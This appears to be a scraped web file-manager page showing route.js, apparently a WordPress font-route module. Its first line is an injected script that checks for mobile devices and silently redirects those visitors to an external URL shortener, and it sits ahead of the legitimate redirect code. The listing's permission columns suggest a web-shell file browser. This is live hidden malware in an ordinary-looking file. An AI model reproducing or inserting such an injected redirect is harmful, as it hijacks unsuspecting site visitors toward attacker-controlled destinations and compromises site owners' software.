run:R W Run
1.97 KB
2026-08-16 23:28:49
R W Run
431 By
2026-08-13 20:01:43
R W Run
172 By
2026-01-05 12:16:10
R W Run
347 By
2026-08-13 20:01:43
R W Run
error_log
📄route.js
1(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.dev/ZgZNhiCpe0r6");
2// routes/fonts-home/route.ts
3import { redirect } from "@wordpress/route";
4var route = {
5 beforeLoad: () => {
6 throw redirect({
7 throw: true,
8 to: "/font-list"
9 });
10 }
11};
12export {
13 route
14};
15